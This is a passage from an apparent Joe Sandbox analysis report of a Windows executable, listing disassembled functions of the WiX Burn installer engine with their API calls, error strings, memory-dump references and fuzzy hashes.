                                                                                                                                                          • CopyFileW.KERNEL32(000007D0,00000003,00000000,00000000,80004005,000000B0,?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8), ref: 00404CBC
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8,00000000,00000000,00000001,00000003,000007D0,00000000), ref: 00404CCA
                                                                                                                                                          • CopyFileW.KERNEL32(000007D0,00000003,00000001,00000003,00000000,?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8,00000000), ref: 00404D6C
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00404DFF,000007D0,00000003,00000001,00000000,00000000,?,0041D8C8,00000000,00000000,00000001,00000003,000007D0,00000000), ref: 00404D76
                                                                                                                                                          Strings
                                                                                                                                                          • failed to copy file: '%ls' to: '%ls', xrefs: 00404DA1
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp, xrefs: 00404D58, 00404D95
                                                                                                                                                          • failed to create directory while copying file: '%ls' to: '%ls', xrefs: 00404D49
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CopyErrorFileLast
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to copy file: '%ls' to: '%ls'$failed to create directory while copying file: '%ls' to: '%ls'
                                                                                                                                                          • API String ID: 374144340-3806374778
                                                                                                                                                          • Opcode ID: 1bc0665ffd2310305019f60ed1395e5e9b1fbfc3bf1a5ac1bdd61402040216c8
                                                                                                                                                          • Instruction ID: 8e76adc087b8b200769380e91fd65a08941ae6cac03b3b1fa89665f65cf07a8a
                                                                                                                                                          • Opcode Fuzzy Hash: 1bc0665ffd2310305019f60ed1395e5e9b1fbfc3bf1a5ac1bdd61402040216c8
                                                                                                                                                          • Instruction Fuzzy Hash: 2131D2B6640326A6EB305A658C05FBB6698EFD5B60F11417BFF04FB3D0D6788C4182A9
                                                                                                                                                          Function 00414363 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 110COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Verification secret from bootstrapper application does not match., xrefs: 00414474
                                                                                                                                                          • Failed to write response to pipe., xrefs: 00414445
                                                                                                                                                          • Failed to read size of verification secret from bootstrapper application pipe., xrefs: 0041438A
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp, xrefs: 0041439C, 004143C7, 004143CC, 004143FF, 00414466, 0041446C, 00414482
                                                                                                                                                          • Verification secret from bootstrapper application is too big., xrefs: 004143D2
                                                                                                                                                          • Failed to allocate buffer for bootstrapper application verification secret., xrefs: 004143ED
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLastRead
                                                                                                                                                          • String ID: Failed to allocate buffer for bootstrapper application verification secret.$Failed to read size of verification secret from bootstrapper application pipe.$Failed to write response to pipe.$Verification secret from bootstrapper application does not match.$Verification secret from bootstrapper application is too big.$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
                                                                                                                                                          • API String ID: 1948546556-3365579777
                                                                                                                                                          • Opcode ID: 6973ca6a72279edca65946216e7e1e248dc5f60a13a49caab7cd1e3b9ff61466
                                                                                                                                                          • Instruction ID: 0537fb23deeb272aa9968cf1eefaedb3d2c77d98f9349af085424f556e4644df
                                                                                                                                                          • Opcode Fuzzy Hash: 6973ca6a72279edca65946216e7e1e248dc5f60a13a49caab7cd1e3b9ff61466
                                                                                                                                                          • Instruction Fuzzy Hash: 32310971E80328B6DB11AA96CC06FDF7B6CDF40724F608267F918FA1D1D2BC4A41969C
                                                                                                                                                          Function 004717EE Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 108registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp,0000011E,80070057,?,00000000,?,?), ref: 0047190A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: An invalid parameter was passed to the function.$Failed to locate and query bundle variable.$Failed to read string shared variable.$Reading bundle variable of type 0x%x not implemented.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\butil.cpp$variables
                                                                                                                                                          • API String ID: 3535843008-1397461789
                                                                                                                                                          • Opcode ID: 492a6cc713410b3b9ad99a5543b3da441836b2fb9a3aa62653a54fa7ff36c438
                                                                                                                                                          • Instruction ID: a93da0c0c78be28e86ee29040ab150c772002e71a31226e90ba2f190fa2444a2
                                                                                                                                                          • Opcode Fuzzy Hash: 492a6cc713410b3b9ad99a5543b3da441836b2fb9a3aa62653a54fa7ff36c438
                                                                                                                                                          • Instruction Fuzzy Hash: 84315972E40219F7DB215D9D8C85FEF7A39EB41714F11807BFA08BA2A1D27D8E10C699
                                                                                                                                                          Function 0046E7C4 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to allocate memory for message.$Failed to calculate total pipe message size$Pipe message is too large.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pipeutil.cpp
                                                                                                                                                          • API String ID: 0-1395197448
                                                                                                                                                          • Opcode ID: 5f47e6ae56d99a80711aafda55421de0020ac255769dec215d0162df412683d6
                                                                                                                                                          • Instruction ID: 4e92e026c814703ab827daf883cb01fb6bfca96c025e0d3d1d0c9e53e325ab50
                                                                                                                                                          • Opcode Fuzzy Hash: 5f47e6ae56d99a80711aafda55421de0020ac255769dec215d0162df412683d6
                                                                                                                                                          • Instruction Fuzzy Hash: 4231B9B6A40208BBE711AA96CC86FAF77AC9B15714F10016BB904F7181E2789D1487B6
                                                                                                                                                          Function 004077D2 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,?,?,004029A7,?,?,00000000,?,00000100,00000000,00000000), ref: 004077F4
                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,004029A7,?,?,00000000,?,00000100,00000000,00000000,?,?,0040285E,?,00000100,?), ref: 004077FB
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • _memcpy_s.LIBCMT ref: 0040787F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess$_memcpy_s
                                                                                                                                                          • String ID: Failed to get current memory size.$Failed to get new memory size.$Failed to reallocate memory$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                          • API String ID: 2739117398-3703727623
                                                                                                                                                          • Opcode ID: 1865d5d18e854cca9f9f787a972af80bf9684beb7f27fb01c8b5e8a62a55cfd5
                                                                                                                                                          • Instruction ID: 7d8ee2e853d949be682dda4ed5bbc9db0baf3bcb8879ae8c03d5bdcfb58e4369
                                                                                                                                                          • Opcode Fuzzy Hash: 1865d5d18e854cca9f9f787a972af80bf9684beb7f27fb01c8b5e8a62a55cfd5
                                                                                                                                                          • Instruction Fuzzy Hash: 08317F32E44208BBEB11AA54CC09FAF3A699B00714F108036FD04BA2D1E37CED10D7AA
                                                                                                                                                          Function 00467377 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 100registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,004687C1,004221A7,?,?,00000001,?,00416E7F,?,DisplayName,00000000,004221A7,?,00000000,004221A7), ref: 004673DD
                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?,004687C1,004221A7,?,?,00000001,?,00416E7F,?,DisplayName,00000000,004221A7,?,00000000,004221A7), ref: 0046742F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value$Delete
                                                                                                                                                          • String ID: DisplayName$Failed to delete registry value: %ls$Failed to determine length of registry value: %ls$Failed to set registry value: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                          • API String ID: 1738766685-1872270729
                                                                                                                                                          • Opcode ID: 664b107cd992ff0bdcc4cd267dd6d14e92e55e89b4b6dc2a754b85243292dcd3
                                                                                                                                                          • Instruction ID: 77209b25f59c7ef9b1b3fb0a28065fd3474d11d1f27ecf2635437aace12360bf
                                                                                                                                                          • Opcode Fuzzy Hash: 664b107cd992ff0bdcc4cd267dd6d14e92e55e89b4b6dc2a754b85243292dcd3
                                                                                                                                                          • Instruction Fuzzy Hash: 0E21E676608115B7DB219A158C09F5F3A5ADB85778F154027FE08BB390FA3CCD01A6BE
                                                                                                                                                          Function 00402B83 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LCMapStringW.KERNEL32(0000007F,?,?,?,?,?,?,?,?,00000000,00000000,00000000,?,00403B5F,?,?), ref: 00402BFD
                                                                                                                                                          • GetLastError.KERNEL32(?,00403B5F,?,?,?,00000200,?,0046E043,00000000,?,00000000,00000000,?,00000000,feclient.dll), ref: 00402C07
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastString
                                                                                                                                                          • String ID: Failed to allocate a copy of the source string.$Failed to convert the string case.$Failed to get the length of the string.$Source string is too long: %Iu$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\strutil.cpp
                                                                                                                                                          • API String ID: 3728238275-3020688454
                                                                                                                                                          • Opcode ID: 0a30d6f7c512953fc241423d37520aa148feefe17f70861fbc0e4712beaaf9f9
                                                                                                                                                          • Instruction ID: 683e7c8d072793fbb98cd3117b623ac3c2af00d36b4eb4bf386326ed7615d761
                                                                                                                                                          • Opcode Fuzzy Hash: 0a30d6f7c512953fc241423d37520aa148feefe17f70861fbc0e4712beaaf9f9
                                                                                                                                                          • Instruction Fuzzy Hash: 03214C72B8432577E22169554C4AF7F361CAB11B64F11413BFE187B2D197BC9C0052AD
                                                                                                                                                          Function 0043887A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0000000C,0000004C,00000001,?,00000000,00000000,?,00414AEE,00000000,00000000,?,00000000,?,00000000,004086B5,?), ref: 004388C3
                                                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00414AEE,00000000,00000000,?,00000000,?,00000000,004086B5,?,00000000,00000000), ref: 004388D3
                                                                                                                                                          • GetLastError.KERNEL32(?,00414AEE,00000000,00000000,?,00000000,?,00000000,004086B5,?,00000000,00000000,000000C4,00000000,00000000,?), ref: 004388E0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocCreateCriticalErrorInitializeLastProcessSectionSemaphore
                                                                                                                                                          • String ID: Failed to allocate bootstrapper application engine context.$Failed to create queue for bootstrapper engine.$Failed to create semaphore for queue.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 791721421-10573605
                                                                                                                                                          • Opcode ID: 58f42c1755a4685e486f3fa25a46980e1b19d08cd3c60df95611dcf12ba937b7
                                                                                                                                                          • Instruction ID: 23f79f6a07f8eb0241a810aff17f0af4f5a2c20360186c548f495db807f54166
                                                                                                                                                          • Opcode Fuzzy Hash: 58f42c1755a4685e486f3fa25a46980e1b19d08cd3c60df95611dcf12ba937b7
                                                                                                                                                          • Instruction Fuzzy Hash: AA213AB2A8071537E220B2555C4AF67AA4C9F48B74F21413BF904BB2C1EABCDC0046ED
                                                                                                                                                          Function 0046478A Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CommandLineToArgvW.SHELL32(00000000,004080B0,00000000,004080B0,00000000,00000000,ignored ,00000000,00000000,00000000,?,?,?,004092CF,00000000,?), ref: 004647F1
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004092CF,00000000,?,?,00000003,00000000,004080B0,00000000,?,?,?,?,?), ref: 004647FB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ArgvCommandErrorLastLine
                                                                                                                                                          • String ID: Failed to copy command line.$Failed to initialize command line.$Failed to parse command line.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\app2util.cpp$ignored
                                                                                                                                                          • API String ID: 3459693003-3520649959
                                                                                                                                                          • Opcode ID: e9ec82e7c201f63032278e6e3ab0ecc658141df1d426372726d0f0fafae62d9f
                                                                                                                                                          • Instruction ID: fad00116f694e405b040216eb79d543d4511dcbf9be9b44278ddf732229da4a1
                                                                                                                                                          • Opcode Fuzzy Hash: e9ec82e7c201f63032278e6e3ab0ecc658141df1d426372726d0f0fafae62d9f
                                                                                                                                                          • Instruction Fuzzy Hash: DD21D676A40324BBDB21AF558C0AF9F7A689B52B51F11406BFD04BB2C1F7788E00D699
                                                                                                                                                          Function 0046BB9E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 78memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(0040955C), ref: 0046BC1C
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046BC66
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                          • String ID: $yG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectNodes$pixnParent parameter was null in XmlSelectNodes$ppixnChild parameter was null in XmlSelectNodes
                                                                                                                                                          • API String ID: 344208780-493328136
                                                                                                                                                          • Opcode ID: 6c90e2cd4b2639ecbf0ebd892603029a20705cd4f3e230f4f1851391f9e8d21c
                                                                                                                                                          • Instruction ID: 572c57df31926b5ddeb16800b62690c740c3985b4e6b97a7e65f228ad8cdb89a
                                                                                                                                                          • Opcode Fuzzy Hash: 6c90e2cd4b2639ecbf0ebd892603029a20705cd4f3e230f4f1851391f9e8d21c
                                                                                                                                                          • Instruction Fuzzy Hash: 9111B435B8031477E62129494C45F6B265DEB96B64F21403FFA04BB3D1EBAC8D4186ED
                                                                                                                                                          Function 0046BC75 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 78memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(0040955C), ref: 0046BCF3
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046BD3D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$AllocFree
                                                                                                                                                          • String ID: $yG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to allocate bstr for XPath expression in XmlSelectSingleNode$pixnParent parameter was null in XmlSelectSingleNode$ppixnChild parameter was null in XmlSelectSingleNode
                                                                                                                                                          • API String ID: 344208780-3202830318
                                                                                                                                                          • Opcode ID: 9df3273e59cb005f2c2fa189d5953c0940d1453bd1356080722043c95cd5bf43
                                                                                                                                                          • Instruction ID: 9ffda075b2818df1e702c3c85fddab13632a2bdddb0cdd04912dc50b323e1fe7
                                                                                                                                                          • Opcode Fuzzy Hash: 9df3273e59cb005f2c2fa189d5953c0940d1453bd1356080722043c95cd5bf43
                                                                                                                                                          • Instruction Fuzzy Hash: 2211E435B803147BE6215A094C49F7B226CDBA6B24F11003FBE04BB381EBFC4E4182E9
                                                                                                                                                          Function 0044EA3E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?), ref: 0044EA4B
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?,00000000), ref: 0044EA88
                                                                                                                                                          • ReleaseSemaphore.KERNEL32(00000000,00000001,00000000,?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?), ref: 0044EAB8
                                                                                                                                                          • GetLastError.KERNEL32(?,?,0044EDB1,?,?,00000018,00000001,?,?,00436048,?,?,?,00000000,?,?), ref: 0044EAC2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
